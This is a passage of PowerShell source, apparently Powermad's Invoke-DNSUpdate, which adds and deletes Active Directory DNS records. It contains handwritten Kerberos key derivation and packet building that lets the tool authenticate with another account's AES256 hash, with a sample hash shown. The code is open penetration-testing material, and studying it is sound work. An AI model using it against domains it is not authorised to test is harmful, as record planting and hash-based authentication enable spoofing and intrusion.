- Invoke-DNSUpdate -DNSType SRV -DNSName _autodiscover._tcp.lab.local -DNSData system.test.local -DNSPriority 100 -DNSWeight 80 -DNSPort 443
- Add SRV Record
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType TXT -DNSName host.test.local -DNSData "some text"
- Add TXT Record
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType TXT -DNSName host.test.local
- Delete TXT record - all deletes follow the same format, just specify DNSType and DNSName
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType A -DNSName www.test.local -Username testuser
- Add A record using another account
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType A -DNSName www.test.local -Username testuser -Hash 0C27E0A5B0D69640B40DDED4A28EB3BB0D157659EBED2816A41A8228E98D111B
- Add A record using another account and an AES256 hash
-
- .LINK
- https://github.com/Kevin-Robertson/Powermad
- #>
-
- [CmdletBinding()]
- param
- (
- [parameter(Mandatory=$false)][String]$DomainController,
- [parameter(Mandatory=$false)][String]$Realm,
- [parameter(Mandatory=$false)][String]$Username,
- [parameter(Mandatory=$false)][System.Security.SecureString]$Password,
- [parameter(Mandatory=$false)][ValidateScript({$_.Length -eq 64})][String]$Hash,
- [parameter(Mandatory=$false)][String]$DNSZone,
- [parameter(Mandatory=$false)][Int]$DNSTTL = 600,
- [parameter(Mandatory=$false)][Int]$DNSPreference,
- [parameter(Mandatory=$false)][Int]$DNSPriority,
- [parameter(Mandatory=$false)][Int]$DNSWeight,
- [parameter(Mandatory=$false)][Int]$DNSPort,
- [parameter(Mandatory=$false)][ValidateSet("Auto","Nonsecure","Secure")][String]$Security = "Secure",
- [parameter(Mandatory=$true)][ValidateSet("A","AAAA","CNAME","MX","PTR","SRV","TXT")][String]$DNSType,
- [parameter(Mandatory=$true)][String]$DNSName,
- [parameter(Mandatory=$false)][ValidateScript({$_.Length -le 255})][String]$DNSData,
- [parameter(Mandatory=$false)][Switch]$TCPClientAuth
- )
-
- if($TCPClientAuth -and !$Username)
- {
- Write-Output "[-] TCPClientAuth requires a username"
- throw
- }
-
- switch ($DNSType)
- {
-
- 'MX'
- {
-
- if(!$DNSPreference)
- {
- Write-Output "[-] MX records require a DNSPreference"
- throw
- }
-
- }
-
- 'PTR'
- {
-
- if(!$DNSZone)
- {
- Write-Output "[-] PTR records require a DNSZone"
- throw
- }
-
- }
-
- 'SRV'
- {
-
- if(!$DNSPriority -and !$DNSWeight -and !$DNSPort -and $DNSData)
- {
- Write-Output "[-] DNSType SRV requires DNSPriority, DNSWeight, and DNSPort"
- throw
- }
-
- if($DNSName -notlike '*._tcp.*' -and $DNSName -notlike '*._udp.*')
- {
- Write-Output "[-] DNSName doesn't contain a protocol"
- throw
- }
-
- }
-
- }
-
- if($Username -and !$Hash)
- {
- $password = Read-Host -Prompt "Enter password" -AsSecureString
- }
-
- if(!$DomainController)
- {
-
- try
- {
- $current_domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
- $DomainController = $current_domain.DomainControllers[0].Name
- $domain = $current_domain.Name
- }
- catch
- {
- Write-Output "[-] Domain controller not located"
- throw
- }
-
- }
- else
- {
- $realm_index = $DomainController.IndexOf(".")
- $domain = $DomainController.Substring($realm_index + 1)
- }
-
- if(!$Realm)
- {
- $realm = $domain
- }
-
- if($TCPClientAuth -or $Hash)
- {
-
- $kerberos_tcpclient = $true
- $realm = $realm.ToUpper()
-
- if($username -like "*\*")
- {
- $username = $username.SubString(($username.IndexOf("\") + 1),($username.Length - ($username.IndexOf("\") + 1)))
- }
-
- if($username -like "*@*")
- {
- $username = $username.SubString(0,($username.IndexOf("@")))
- }
-
- if($Username.EndsWith("$"))
- {
- $salt = $realm + "host" + $Username.SubString(0,$Username.Length - 1) + "." + $realm.ToLower()
- }
- else
- {
- $salt = $realm + $Username
- }
-
- Write-Verbose "[+] Salt $salt"
- }
-
- if(!$DNSZone)
- {
- $DNSZone_index = $DomainController.IndexOf(".")
- $DNSZone = $DomainController.Substring($DNSZone_index + 1)
- }
-
- $DNSZone = $DNSZone.ToLower()
-
- function ConvertFrom-PacketOrderedDictionary
- {
- param($ordered_dictionary)
-
- ForEach($field in $ordered_dictionary.Values)
- {
- $byte_array += $field
- }
-
- return $byte_array
- }
-
- function Get-KerberosAES256UsageKey
- {
- param([String]$key_type,[Int]$usage_number,[Byte[]]$base_key)
-
- $padding = 0x00 * 16
-
- if($key_type -eq 'checksum')
- {
- switch($usage_number)
- {
- 25 {[Byte[]]$usage_constant = 0x5d,0xfb,0x7d,0xbf,0x53,0x68,0xce,0x69,0x98,0x4b,0xa5,0xd2,0xe6,0x43,0x34,0xba + $padding}
- }
- }
- elseif($key_type -eq 'encrypt')
- {
-
- switch($usage_number)
- {
- 1 {[Byte[]]$usage_constant = 0xae,0x2c,0x16,0x0b,0x04,0xad,0x50,0x06,0xab,0x55,0xaa,0xd5,0x6a,0x80,0x35,0x5a + $padding}
- 3 {[Byte[]]$usage_constant = 0xbe,0x34,0x9a,0x4d,0x24,0xbe,0x50,0x0e,0xaf,0x57,0xab,0xd5,0xea,0x80,0x75,0x7a + $padding}
- 4 {[Byte[]]$usage_constant = 0xc5,0xb7,0xdc,0x6e,0x34,0xc7,0x51,0x12,0xb1,0x58,0xac,0x56,0x2a,0x80,0x95,0x8a + $padding}
- 7 {[Byte[]]$usage_constant = 0xde,0x44,0xa2,0xd1,0x64,0xe0,0x51,0x1e,0xb7,0x5b,0xad,0xd6,0xea,0x80,0xf5,0xba + $padding}
- 11 {[Byte[]]$usage_constant = 0xfe,0x54,0xaa,0x55,0xa5,0x02,0x52,0x2f,0xbf,0x5f,0xaf,0xd7,0xea,0x81,0x75,0xfa + $padding}
- 12 {[Byte[]]$usage_constant = 0x05,0xd7,0xec,0x76,0xb5,0x0b,0x53,0x33,0xc1,0x60,0xb0,0x58,0x2a,0x81,0x96,0x0b + $padding}
- }
-
- }
- elseif($key_type -eq 'integrity')
- {
-
- switch($usage_number)
- {
- 1 {[Byte[]]$usage_constant = 0x5b,0x58,0x2c,0x16,0x0a,0x5a,0xa8,0x05,0x56,0xab,0x55,0xaa,0xd5,0x40,0x2a,0xb5 + $padding}
- 4 {[Byte[]]$usage_constant = 0x72,0xe3,0xf2,0x79,0x3a,0x74,0xa9,0x11,0x5c,0xae,0x57,0x2b,0x95,0x40,0x8a,0xe5 + $padding}
- 7 {[Byte[]]$usage_constant = 0x8b,0x70,0xb8,0xdc,0x6a,0x8d,0xa9,0x1d,0x62,0xb1,0x58,0xac,0x55,0x40,0xeb,0x15 + $padding}
- 11 {[Byte[]]$usage_constant = 0xab,0x80,0xc0,0x60,0xaa,0xaf,0xaa,0x2e,0x6a,0xb5,0x5a,0xad,0x55,0x41,0x6b,0x55 + $padding}
- }
-
- }
-
- $AES = New-Object "System.Security.Cryptography.AesManaged"
- $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
- $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
- $AES.IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
- $AES.KeySize = 256
- $AES.Key = $base_key
- $AES_encryptor = $AES.CreateEncryptor()
- $usage_key = $AES_encryptor.TransformFinalBlock($usage_constant,0,$usage_constant.Length)
-
- return $usage_key
- }
-
- # TCPClient Kerberos start - this section can be removed if not using a hash or -TCPClientAuth
- function Get-KerberosAES256BaseKey
- {
- param([String]$salt,[System.Security.SecureString]$password)
-
- $password_BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($password)
- $password_cleartext = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($password_BSTR)
- [Byte[]]$salt = [System.Text.Encoding]::UTF8.GetBytes($salt)
- [Byte[]]$password_cleartext = [System.Text.Encoding]::UTF8.GetBytes($password_cleartext)
- $constant = 0x6B,0x65,0x72,0x62,0x65,0x72,0x6F,0x73,0x7B,0x9B,0x5B,0x2B,0x93,0x13,0x2B,0x93,0x5C,0x9B,0xDC,0xDA,0xD9,0x5C,0x98,0x99,0xC4,0xCA,0xE4,0xDE,0xE6,0xD6,0xCA,0xE4
- $PBKDF2 = New-Object Security.Cryptography.Rfc2898DeriveBytes($password_cleartext,$salt,4096)
- Remove-Variable password_cleartext
- $PBKDF2_key = $PBKDF2.GetBytes(32)
- $AES = New-Object "System.Security.Cryptography.AesManaged"
- $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
- $AES.Padding = [System.Security.Cryptography.PaddingMode]::None
- $AES.IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
- $AES.KeySize = 256
- $AES.Key = $PBKDF2_key
- $AES_encryptor = $AES.CreateEncryptor()
- $base_key_part_1 = $AES_encryptor.TransformFinalBlock($constant,0,$constant.Length)
- $base_key_part_2 = $AES_encryptor.TransformFinalBlock($base_key_part_1,0,$base_key_part_1.Length)
- $base_key = $base_key_part_1[0..15] + $base_key_part_2[0..15]
-
- return $base_key
- }
-
- function New-PacketKerberosASREQ()
- {
- param([Byte[]]$username,[Byte[]]$realm,[Byte[]]$namestring,[Byte[]]$nonce,[Byte[]]$pac,[Byte[]]$pac_signature)
-
- $timestamp = Get-Date
- $till = $timestamp.AddYears(20)
- $timestamp = ("{0:u}" -f $timestamp) -replace "-","" -replace " ","" -replace ":",""
- $till = ("{0:u}" -f $till) -replace "-","" -replace " ","" -replace ":",""
- [Byte[]]$timestamp = [System.Text.Encoding]::UTF8.GetBytes($timestamp)
- [Byte[]]$till = [System.Text.Encoding]::UTF8.GetBytes($till)
-
- if($pac)
- {
- $pac_extra_length = 78
- }
-
- [Byte[]]$namestring1_length = Get-ASN1LengthArray $namestring.Count
- [Byte[]]$namestring_length = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + 6)
- [Byte[]]$namestring_length2 = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + $namestring_length.Count + 7)
- [Byte[]]$sname_length = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + 13)
- [Byte[]]$sname_length2 = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + 14)
- [Byte[]]$realm_length = Get-ASN1LengthArray $realm.Count
- [Byte[]]$realm_length2 = Get-ASN1LengthArray ($realm.Count + $realm_length.Count + 1)
- [Byte[]]$cname_length = Get-ASN1LengthArray $username.Count
- [Byte[]]$cname_length2 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + 1)
- [Byte[]]$cname_length3 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + 2)
- [Byte[]]$cname_length4 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + 8)
- [Byte[]]$cname_length5 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + 9)
- $grouped_length = $address_length.Count + $address_length2.Count + $address_length3.Count + $address_length4.Count + $address_length5.Count + $namestring.Count +
- $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count + $realm.Count + $realm_length.Count +
- $realm_length2.Count + $username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + $cname_length5.Count
- [Byte[]]$reqbody_length = Get-ASN1LengthArrayLong ($grouped_length + 86)
- [Byte[]]$reqbody_length2 = Get-ASN1LengthArrayLong ($grouped_length + $reqbody_length.Count + 87)
- [Byte[]]$message_length = Get-ASN1LengthArrayLong ($grouped_length + $reqbody_length.Count + $reqbody_length2.Count + $pac_extra_length + 114)
- [Byte[]]$message_length2 = Get-ASN1LengthArrayLong ($grouped_length + $reqbody_length.Count + $reqbody_length2.Count + $message_length.Count + $pac_extra_length + 115)
- [Byte[]]$asreq_length = [System.BitConverter]::GetBytes($grouped_length + $reqbody_length.Count + $reqbody_length2.Count + $message_length.Count + $message_length2.Count +
- $pac_extra_length + 116)[3..0]
-
- $packet_KerberosASREQ = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_KerberosASREQ.Add("Length",$asreq_length)
- $packet_KerberosASREQ.Add("Message_Encoding",[Byte[]](0x6a) + $message_length2 + [Byte[]](0x30) + $message_length)
- $packet_KerberosASREQ.Add("Message_PVNO_Encoding",[Byte[]](0xa1,0x03,0x02,0x01))
- $packet_KerberosASREQ.Add("Message_PVNO",[Byte[]](0x05))
- $packet_KerberosASREQ.Add("Message_MSGType_Encoding",[Byte[]](0xa2,0x03,0x02,0x01))
- $packet_KerberosASREQ.Add("Message_MSGType",[Byte[]](0x0a))
-
- if($pac)
- {
- $packet_KerberosASREQ.Add("Message_PAData_Encoding",[Byte[]](0xa3,0x5c,0x30,0x5a,0x30,0x4c,0xa1,0x03,0x02,0x01,0x02))
- $packet_KerberosASREQ.Add("Message_PAData0_Type_Encoding",[Byte[]](0xa2,0x45,0x04,0x43,0x30,0x41,0xa0,0x03,0x02,0x01))
- $packet_KerberosASREQ.Add("Message_PAData0_Type",[Byte[]](0x12))
- $packet_KerberosASREQ.Add("Message_PAData0_Value_Encoding",[Byte[]](0xa2,0x3a,0x04,0x38))
- $packet_KerberosASREQ.Add("Message_PAData0_Value",$pac)
- $packet_KerberosASREQ.Add("Message_PAData0_Signature",$pac_signature)
- $packet_KerberosASREQ.Add("Message_PAData1_Type_Encoding",[Byte[]](0x30,0x0a,0xa1,0x04,0x02,0x02))
- }
- else
- {
- $packet_KerberosASREQ.Add("Message_PAData_Encoding",[Byte[]](0xa3,0x0e,0x30,0x0c,0x30,0x0a))
- $packet_KerberosASREQ.Add("Message_PAData1_Type_Encoding",[Byte[]](0xa1,0x04,0x02,0x02))
- }
-
- $packet_KerberosASREQ.Add("Message_PAData1_Type",[Byte[]](0x00,0x95))
- $packet_KerberosASREQ.Add("Message_PAData1_Value_Encoding",[Byte[]](0xa2,0x02,0x04))
- $packet_KerberosASREQ.Add("Message_PAData1_Value",[Byte[]](0x00))
- $packet_KerberosASREQ.Add("Message_REQBody_Encoding",[Byte[]](0xa4) + $reqbody_length2 + [Byte[]](0x30) + $reqbody_length)
- $packet_KerberosASREQ.Add("Message_REQBody_KDCOptions_Encoding",[Byte[]](0xa0,0x07,0x03,0x05))
- $packet_KerberosASREQ.Add("Message_REQBody_KDCOptions_Padding",[Byte[]](0x00))
- $packet_KerberosASREQ.Add("Message_REQBody_KDCOptions",[Byte[]](0x50,0x00,0x00,0x00))
- $packet_KerberosASREQ.Add("Message_REQBody_CName_Encoding",[Byte[]](0xa1) + $cname_length5 + [Byte[]](0x30) + $cname_length4)
- $packet_KerberosASREQ.Add("Message_REQBody_CName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosASREQ.Add("Message_REQBody_CName_NameType",[Byte[]](0x01))
- $packet_KerberosASREQ.Add("Message_REQBody_CName_NameString_Encoding",[Byte[]](0xa1) + $cname_length3 + [Byte[]](0x30) + $cname_length2 + [Byte[]](0x1b) + $cname_length)
- $packet_KerberosASREQ.Add("Message_REQBody_CName_NameString",$username)
- $packet_KerberosASREQ.Add("Message_REQBody_Realm_Encoding",[Byte[]](0xa2) + $realm_length2 + [Byte[]](0x1b) + $realm_length)
- $packet_KerberosASREQ.Add("Message_REQBody_Realm",$realm)
- $packet_KerberosASREQ.Add("Message_REQBody_SName_Encoding",[Byte[]](0xa3) + $sname_length2 + [Byte[]](0x30) + $sname_length)
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameType",[Byte[]](0x01))
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString_Encoding",[Byte[]](0xa1) + $namestring_length2 + [Byte[]](0x30) + $namestring_length)
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString0_Encoding",[Byte[]](0x1b,0x03))
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString0",[Byte[]](0x44,0x4e,0x53))
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString1_Encoding",[Byte[]](0x1b) + $namestring1_length) #50
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString1",$namestring)
- $packet_KerberosASREQ.Add("Message_REQBody_Till_Encoding",[Byte[]](0xa5,0x11,0x18,0x0f))
- $packet_KerberosASREQ.Add("Message_REQBody_Till",$till)
- $packet_KerberosASREQ.Add("Message_REQBody_Nonce_Encoding",[Byte[]](0xa7,0x06,0x02,0x04))
- $packet_KerberosASREQ.Add("Message_REQBody_Nonce",$nonce)
- $packet_KerberosASREQ.Add("Message_REQBody_EType_Encoding",[Byte[]](0xa8,0x15,0x30,0x13))
- $packet_KerberosASREQ.Add("Message_REQBody_EType",[Byte[]](0x02,0x01,0x12,0x02,0x01,0x11,0x02,0x01,0x17,0x02,0x01,0x18,0x02,0x02,0xff,0x79,0x02,0x01,0x03))
-
- return $packet_KerberosASREQ
- }
-
- function New-PacketKerberosAPREQ()
- {
- param([Byte[]]$realm,[Byte[]]$spn,[Byte[]]$kvno,[Byte[]]$ticket,[Byte[]]$authenticator,[Byte[]]$authenticator_signature)
-
- $authenticator += $authenticator_signature
- $parameter_length = $realm.Count + $spn.Count + $ticket.Count + $authenticator.Count
- [Byte[]]$authenticator_length = Get-ASN1LengthArrayLong $authenticator.Count
- [Byte[]]$authenticator_length2 = Get-ASN1LengthArrayLong ($authenticator.Count + $authenticator_length.Count + 1)
- [Byte[]]$authenticator_length3 = Get-ASN1LengthArrayLong ($authenticator.Count + $authenticator_length.Count + $authenticator_length2.Count + 7)
- [Byte[]]$authenticator_length4 = Get-ASN1LengthArrayLong ($authenticator.Count + $authenticator_length.Count + $authenticator_length2.Count + $authenticator_length3.Count + 8)
- [Byte[]]$ticket_length = Get-ASN1LengthArrayLong $ticket.Count
- [Byte[]]$ticket_length2 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + 1)
- [Byte[]]$ticket_length3 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + 12)
- [Byte[]]$ticket_length4 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + 13)
- [Byte[]]$namestring1_length = Get-ASN1LengthArray $spn.Count
- [Byte[]]$namestring_length = Get-ASN1LengthArray ($spn.Count + $namestring_length.Count + 4)
- [Byte[]]$namestring_length2 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + 5)
- [Byte[]]$sname_length = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + 4)
- [Byte[]]$sname_length2 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + 5)
- [Byte[]]$sname_length3 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count + 11)
- [Byte[]]$sname_length4 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + 12)
- [Byte[]]$realm_length = Get-ASN1LengthArray $realm.Count
- [Byte[]]$realm_length2 = Get-ASN1LengthArray ($realm.Count + $realm_length.Count + 1)
- [Byte[]]$ticket_length5 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + $ticket_length4.Count +
- $spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + $sname_length4.Count + $realm.Count + $realm_length.Count + $realm_length2.Count + 34)
- [Byte[]]$ticket_length6 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + $ticket_length4.Count +
- $spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + $sname_length4.Count + $realm.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + 35)
- [Byte[]]$ticket_length7 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + $ticket_length4.Count +
- $spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + $sname_length4.Count + $realm.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + 36)
- [Byte[]]$apreq_length = Get-ASN1LengthArrayLong ($parameter_length + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count +
- $ticket_length4.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + $sname_length4.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + $ticket_length7.Count + 73)
- [Byte[]]$apreq_length2 = Get-ASN1LengthArrayLong ($parameter_length + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count +
- $ticket_length4.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + $sname_length4.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + $ticket_length7.Count +
- $apreq_length.Count + 74)
- [Byte[]]$length = Get-ASN1LengthArrayLong ($parameter_length + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count +
- $ticket_length4.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + $sname_length4.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + $ticket_length7.Count +
- $apreq_length.Count + $apreq_length2.Count + 88)
-
- $packet_KerberosAPREQ = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_KerberosAPREQ.Add("Length",([Byte[]](0x60) + $length))
- $packet_KerberosAPREQ.Add("MechToken_ThisMech",[Byte[]](0x06,0x09,0x2a,0x86,0x48,0x86,0xf7,0x12,0x01,0x02,0x02))
- $packet_KerberosAPREQ.Add("MechToken_TokenID",[Byte[]](0x01,0x00))
- $packet_KerberosAPREQ.Add("APReq_Encoding",[Byte[]](0x6e) + $apreq_length2 + [Byte[]](0x30) + $apreq_length)
- $packet_KerberosAPREQ.Add("PVNO_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("PVNO",[Byte[]]0x05)
- $packet_KerberosAPREQ.Add("MSGType_Encoding",[Byte[]](0xa1,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("MSGType",[Byte[]](0x0e))
- $packet_KerberosAPREQ.Add("Padding_Encoding",[Byte[]](0xa2,0x07,0x03,0x05))
- $packet_KerberosAPREQ.Add("Padding",[Byte[]](0x00))
- $packet_KerberosAPREQ.Add("APOptions",[Byte[]](0x20,0x00,0x00,0x00))
- $packet_KerberosAPREQ.Add("Ticket_Encoding",[Byte[]](0xa3) + $ticket_length7 + [Byte[]](0x61) + $ticket_length6 + [Byte[]](0x30) + $ticket_length5)
- $packet_KerberosAPREQ.Add("Ticket_TKTVNO_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("Ticket_TKTVNO",[Byte[]](0x05))
- $packet_KerberosAPREQ.Add("Ticket_Realm_Encoding",[Byte[]](0xa1) + $realm_length2 + [Byte[]](0x1b) + $realm_length)
- $packet_KerberosAPREQ.Add("Ticket_Realm",$realm)
- $packet_KerberosAPREQ.Add("Ticket_SName_Encoding",[Byte[]](0xa2) + $sname_length4 + [Byte[]](0x30) + $sname_length3)
- $packet_KerberosAPREQ.Add("Ticket_SName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("Ticket_SName_NameType",[Byte[]](0x01))
- $packet_KerberosAPREQ.Add("Ticket_SName_NameString_Encoding",[Byte[]](0xa1) + $sname_length2 + [Byte[]](0x30) + $sname_length)
- $packet_KerberosAPREQ.Add("Ticket_SName_NameString0_Encoding",[Byte[]](0x1b,0x03))
- $packet_KerberosAPREQ.Add("Ticket_SName_NameString0",[Byte[]](0x44,0x4e,0x53))
- $packet_KerberosAPREQ.Add("Ticket_SName_NameString1_Encoding",[Byte[]](0x1b) + $namestring1_length)
- $packet_KerberosAPREQ.Add("Ticket_SName_NameString1",$spn)
- $packet_KerberosAPREQ.Add("Ticket_EncPart_Encoding",[Byte[]](0xa3) + $ticket_length4 + [Byte[]](0x30) + $ticket_length3)
- $packet_KerberosAPREQ.Add("Ticket_EncPart_EType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("Ticket_EncPart_EType",[Byte[]](0x12))
- $packet_KerberosAPREQ.Add("Ticket_EncPart_KVNO_Encoding",[Byte[]](0xa1,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("Ticket_EncPart_KVNO",$kvno)
- $packet_KerberosAPREQ.Add("Ticket_EncPart_Cipher_Encoding",[Byte[]](0xa2) + $ticket_length2 + [Byte[]](0x04) + $ticket_length)
- $packet_KerberosAPREQ.Add("Ticket_EncPart_Cipher",$ticket)
- $packet_KerberosAPREQ.Add("Authenticator_Encoding",[Byte[]](0xa4) + $authenticator_length4 + [Byte[]](0x30) + $authenticator_length3)
- $packet_KerberosAPREQ.Add("Authenticator_EType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("Authenticator_EType",[Byte[]](0x12))
- $packet_KerberosAPREQ.Add("Authenticator_Cipher_Encoding",[Byte[]](0xa2) + $authenticator_length2 + [Byte[]](0x04) + $authenticator_length)
- $packet_KerberosAPREQ.Add("Authenticator_Cipher",$authenticator)
-
- return $packet_KerberosAPREQ
- }
-
- function Unprotect-KerberosASREP
- {
- param([Byte[]]$ke_key,[Byte[]]$encrypted_data)
-
- $final_block_length = [Math]::Truncate($encrypted_data.Count % 16)
- [Byte[]]$final_block = $encrypted_data[($encrypted_data.Count - $final_block_length)..$encrypted_data.Count]
- [Byte[]]$penultimate_block = $encrypted_data[($encrypted_data.Count - $final_block_length - 16)..($encrypted_data.Count - $final_block_length - 1)]
- $AES = New-Object "System.Security.Cryptography.AesManaged"
- $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
- $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
- $AES.IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
- $AES.KeySize = 256
- $AES.Key = $ke_key
- $AES_decryptor = $AES.CreateDecryptor()
- $penultimate_block_cleartext = $AES_decryptor.TransformFinalBlock($penultimate_block,0,$penultimate_block.Length)
- [Byte[]]$final_block_padding = $penultimate_block_cleartext[$final_block_length..$penultimate_block_cleartext.Count]
- $final_block += $final_block_padding
- [Byte[]]$cts_encrypted_data = $encrypted_data[0..($encrypted_data.Count - $final_block_length - 17)] + $final_block + $penultimate_block
- [Byte[]]$cleartext = $AES_decryptor.TransformFinalBlock($cts_encrypted_data,0,$cts_encrypted_data.Length)
-
- return $cleartext
- }
-
- function New-KerberosPACTimestamp
- {
- param([Byte[]]$ke_key)
-
- [Byte[]]$timestamp = Get-KerberosTimestampUTC
- [String]$confounder = [String](1..16 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- [Byte[]]$confounder = $confounder.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
- [Byte[]]$PAC_Timestamp = $confounder +
- 0x30,0x1a,0xa0,0x11,0x18,0x0f +
- $timestamp +
- 0xa1,0x05,0x02,0x03,0x01,0x70,0x16
-
- return $PAC_Timestamp
- }
-
- function New-KerberosAuthenticator
- {
- param([Byte[]]$realm,[Byte[]]$username,[Byte[]]$subkey,[Byte[]]$sequence_number)
-
- $parameter_length = $realm.Count + $username.Count + $subkey.Count
- [Byte[]]$subkey_length = Get-ASN1LengthArray $subkey.Count
- [Byte[]]$subkey_length2 = Get-ASN1LengthArray ($subkey.Count + $subkey_length.Count + 1)
- [Byte[]]$subkey_length3 = Get-ASN1LengthArray ($subkey.Count + $subkey_length.Count + $subkey_length2.Count + 7)
- [Byte[]]$subkey_length4 = Get-ASN1LengthArray ($subkey.Count + $subkey_length.Count + $subkey_length2.Count + $subkey_length3.Count + 8)
- [Byte[]]$cname_length = Get-ASN1LengthArray $username.Count
- [Byte[]]$cname_length2 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + 1)
- [Byte[]]$cname_length3 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + 2)
- [Byte[]]$cname_length4 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + 8)
- [Byte[]]$cname_length5 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + 9)
- [Byte[]]$crealm_length = Get-ASN1LengthArray $realm.Count
- [Byte[]]$crealm_length2 = Get-ASN1LengthArray ($realm.Count + $crealm_length.Count + 1)
- [Byte[]]$authenticator_length = Get-ASN1LengthArrayLong ($parameter_length + 99 + $crealm_length.Count + $crealm_length2.Count +
- $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + $cname_length5.Count + $subkey_length.Count +
- $subkey_length2.Count + $subkey_length3.Count + $subkey_length4.Count)
